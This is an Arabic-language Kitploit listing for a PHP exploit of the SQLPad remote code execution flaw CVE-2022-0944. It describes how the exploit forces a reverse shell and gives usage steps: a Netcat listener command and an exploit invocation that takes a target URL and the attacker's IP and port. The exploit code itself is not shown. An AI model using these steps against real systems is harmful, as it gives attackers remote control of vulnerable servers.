Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
SQLPad-RCE-Exploit-CVE-2022-0944 — CVE-2022-0944 استغلال تنفيذ التعليمات البرمجية عن بُعد | Kitploit
أدوات/GitHubGitHub/lipeozyy/sqlpad-rce-exploit-cve-2022-0944
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHublipeozyy/sqlpad-rce-exploit-cve-2022-0944

SQLPad-RCE-Exploit-CVE-2022-0944

CVE-2022-0944 استغلال تنفيذ التعليمات البرمجية عن بُعد

عرض المستودع
13منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

كيف يعمل:

يُصمَّم هذا الكود البرمجي بلغة PHP لاستغلال ثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) في SQLPad، المرتبطة بـ CVE-2022-0944.
يعمل الكود عن طريق حقن تعليمات برمجية خبيثة في تطبيق SQLPad، مما يُجبِره على تنفيذ أمر نظام يفتح قشرة عكسية (reverse shell) – اتصالاً يمنح المهاجم تحكماً عن بُعد في النظام المُعرَّض للثغرة.


المتطلبات الأساسية:

  • PHP CLI – sudo apt-get install php-cli
  • cURL (مكتبة cURL الخاصة بـ PHP) – sudo apt-get install php-curl

الاستخدام:

1. إعداد المستمع (على جهاز المهاجم)

لالتقاط اتصال القشرة العكسية، شغّل Netcat على جهاز المهاجم:

root@kitploit:~
nc -lvnp 4444

تشغيل الاستغلال

root@kitploit:~
php exploit.php <root_url> <attacker_ip> <attacker_port>

<root_url>: عنوان URL الجذر لـ SQLPad المُعرَّض للثغرة (مثال: http://target.com:3000)

<attacker_ip>: عنوان IP الخاص بالمهاجم الذي يستمع لاتصال القشرة العكسية (نفس عنوان IP الخاص بـ Netcat)

<attacker_port>: المنفذ الذي يستمع عليه المهاجم (نفس منفذ Netcat)

المراجع

اعتمد منطق الاستغلال الأصلي على هذا المستودع:

🔗 0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944

كان هدفي هنا فهم منطق الاستغلال وإعادة كتابته بلغة برمجة أخرى كتحدٍّ شخصي.

مرجع إضافي: 🔗 CVE-2022-0944 – NVD

تنزيل الأداة